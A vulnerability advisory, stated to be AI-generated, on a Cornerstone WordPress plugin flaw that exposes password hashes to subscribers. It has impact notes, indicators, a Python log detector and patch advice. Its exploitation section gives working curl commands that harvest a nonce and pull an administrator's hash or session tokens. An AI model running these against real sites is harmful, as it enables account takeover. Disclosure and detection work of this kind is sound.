CVE-2026-9710
WordPress Vulnerability Analysis and Mitigation

Overview

CVE-2026-9710 is an authenticated sensitive data disclosure vulnerability in the premium Themeco Cornerstone WordPress plugin (bundled with the X Theme) that allows any logged-in user with Subscriber-level access or higher to retrieve raw password hashes and arbitrary user metadata. The flaw affects Cornerstone versions from 3.0.0 up to (but not including) 7.8.8, distributed inside X Theme 10.8.5 and earlier from theme.co. It does not affect the unrelated free cornerstone plugin (v0.8.x) available on the WordPress.org repository. The vulnerability was publicly disclosed on June 3, 2026, with a patch released on June 24, 2026. WPScan classifies it with a CVSS score of 7.7 (High) (WPScan, GitHub Advisory).

Technical details

The root cause is a missing capability check (CWE-200: Information Exposure) on the plugin's CSS-preview request handler endpoint (?cs-css=1). The plugin unconditionally injects an admin nonce (_cs_nonce) into every wp-admin page for all authenticated users, regardless of their role. An attacker can extract this nonce from any wp-admin page (e.g., /wp-admin/profile.php), then POST a crafted JSON payload to the CSS-preview endpoint specifying a target user_id and requesting the user_pass meta key. The dynamic content token engine evaluates the request against the target user's database record and returns the raw bcrypt or PHPass password hash directly in the HTTP response. Any other user meta key (e.g., wp_capabilities, session_tokens) can similarly be exfiltrated by changing the key= argument (WPScan).

Impact

Successful exploitation allows any authenticated WordPress user (Subscriber role or above) to exfiltrate the raw password hash (user_pass) and arbitrary user metadata for any account on the site, including administrators. Recovered bcrypt or PHPass hashes can be subjected to offline cracking, potentially leading to full administrator account takeover, site defacement, data theft, or further lateral movement within the hosting environment. Session tokens and capability metadata exposed via the same mechanism could also enable direct session hijacking without requiring password cracking (WPScan, GitHub Advisory).

Exploitation steps

  1. Authenticate as a low-privileged user: Log in to the target WordPress site with any account (Subscriber or higher) using a standard authentication request:
curl -sk -c jar -X POST "https://TARGET/wp-login.php" \
  --data-urlencode "log=subscriber" \
  --data-urlencode "pwd=PASSWORD" \
  --data-urlencode "wp-submit=Log In" \
  --data-urlencode "redirect_to=https://TARGET/wp-admin/" \
  --data-urlencode "testcookie=1" -o /dev/null
  2. Extract the Cornerstone admin nonce: Fetch any wp-admin page and parse the _cs_nonce value that Cornerstone unconditionally injects for all logged-in users:
curl -sk -b jar "https://TARGET/wp-admin/profile.php" -o profile.html
CS_NONCE=$(python3 -c 'import re,json,sys;h=open("profile.html").read();m=re.search(r"csAdminData\s*=\s*({.*?});",h,re.DOTALL);print(json.loads(m.group(1))["common"]["_cs_nonce"])')
  3. POST a dynamic-content token payload to the CSS-preview endpoint: Target the administrator account (user_id=1) and request the user_pass meta key:
curl -sk -b jar -X POST "https://TARGET/?cs-css=1" \
  -H "Content-Type: application/json" \
  --data "{\"_nonce\":\"$CS_NONCE\",\"request\":{\"type\":\"post-process-css\",\"previewState\":{\"documentId\":1,\"settings\":{}},\"items\":[{\"css\":\"{{dc:user:meta key=\\\"user_pass\\\" user=\\\"1\\\"}}\"}]}}"
  4. Retrieve the password hash: The server responds with HTTP 200 and a JSON body containing the raw user_pass value (e.g., $wp$2y$12$...), which can be submitted to an offline cracking tool such as Hashcat or John the Ripper.
  5. Escalate access: Use the cracked administrator password to log in with full privileges, or substitute other meta keys (e.g., session_tokens) to attempt direct session hijacking (WPScan).

Indicators of compromise

  • Network: Unusual POST requests to /?cs-css=1 originating from low-privileged user sessions; JSON payloads containing dc:user:meta tokens with key=user_pass or other sensitive meta keys targeting arbitrary user IDs.
  • Logs: WordPress access logs showing repeated POST requests to /?cs-css=1 from authenticated sessions not associated with page builder editing activity; HTTP 200 responses to these requests from non-administrator accounts.
  • Logs: Requests to /wp-admin/profile.php or other wp-admin pages immediately followed by POST requests to /?cs-css=1 from the same session cookie, suggesting nonce harvesting.
  • Logs: JSON request bodies in access logs containing post-process-css type requests with user_pass, session_tokens, or wp_capabilities as the requested meta key (WPScan).
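As an added example (not code from the advisory, WPScan, or Themeco), the following Python flags the indicators listed above over a constructed, simplified access log. The log field layout (session id, ISO timestamp, method, path, status, optional request body) is an assumption; standard combined-format logs do not record bodies, so the body rule only fires where a WAF or audit log captures them.

```python
# Added example: detect CVE-2026-9710 indicators in a simplified access log.
# Log layout (assumed): <session> <iso-timestamp> <METHOD> <path> <status> [body]
import re
from collections import defaultdict
from datetime import datetime

SENSITIVE_KEYS = {"user_pass", "session_tokens", "wp_capabilities"}
# Matches the meta key inside a dc:user:meta token, e.g. {{dc:user:meta key=\"user_pass\" user=\"1\"}}
META_TOKEN = re.compile(r'dc:user:meta[^}]*key=\\?"(?P<key>[^"\\]+)')
LINE = re.compile(r'^(?P<sess>\S+) (?P<ts>\S+) (?P<method>[A-Z]+) (?P<path>\S+) '
                  r'(?P<status>\d{3})(?: (?P<body>.*))?$')

# Constructed sample: sess_a harvests a nonce then requests user_pass; sess_b is benign.
SAMPLE_LOG = [
    'sess_a 2026-06-05T10:00:00 GET /wp-admin/profile.php 200',
    'sess_a 2026-06-05T10:00:04 POST /?cs-css=1 200 {"_nonce":"abc","request":{"type":'
    '"post-process-css","items":[{"css":"{{dc:user:meta key=\\"user_pass\\" user=\\"1\\"}}"}]}}',
    'sess_b 2026-06-05T10:05:00 POST /?cs-css=1 200 {"request":{"type":"post-process-css",'
    '"items":[{"css":".x{color:red}"}]}}',
]

def parse(lines):
    """Yield dict records for lines matching the assumed layout; skip the rest."""
    for raw in lines:
        m = LINE.match(raw)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.fromisoformat(rec["ts"])
            yield rec

def detect(lines, window_s=60, repeat_threshold=3):
    """Return (session, reason) alerts for the three indicator classes above."""
    alerts, last_admin_get, css_posts = [], {}, defaultdict(int)
    for r in parse(lines):
        sess, path = r["sess"], r["path"]
        if r["method"] == "GET" and path.startswith("/wp-admin/"):
            last_admin_get[sess] = r["ts"]          # possible nonce harvesting
            continue
        if not (r["method"] == "POST" and path == "/?cs-css=1"):
            continue
        for key in META_TOKEN.findall(r["body"] or ""):   # sensitive meta key in body
            if key in SENSITIVE_KEYS:
                alerts.append((sess, f"dc:user:meta requesting {key}"))
        prev = last_admin_get.get(sess)                   # wp-admin fetch then cs-css POST
        if prev and (r["ts"] - prev).total_seconds() <= window_s:
            alerts.append((sess, "wp-admin fetch followed by POST /?cs-css=1"))
        if r["status"] == "200":
            css_posts[sess] += 1
    for sess, n in css_posts.items():                     # repeated successful POSTs
        if n >= repeat_threshold:
            alerts.append((sess, f"{n} successful POSTs to /?cs-css=1"))
    return alerts
```

Sessions tied to legitimate page-builder editing will also POST to /?cs-css=1, so the repeat rule is a triage signal; the meta-key rule is the high-confidence one.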

Mitigation and workarounds

Update the premium Themeco Cornerstone plugin to version 7.8.8 or later (distributed inside X Theme 10.8.6 or later from theme.co). No official configuration-based workaround has been published; the only reliable remediation is applying the patch. As interim measures, administrators should restrict wp-admin access to trusted IP addresses where possible, audit user accounts for unexpected Subscriber-level registrations, and monitor access logs for suspicious POST requests to /?cs-css=1. If immediate patching is not possible, consider temporarily disabling the Cornerstone plugin (WPScan, GitHub Advisory).

Community reactions

The vulnerability was discovered and submitted by researcher Real_King_Engine (ISAL FRAMEWORK), who also provided the detailed PoC. WPScan verified the report and published it on June 3, 2026. No notable broader media coverage or significant social media discussion has been identified beyond standard vulnerability database aggregation (WPScan).

Source: This report was generated using artificial intelligence.
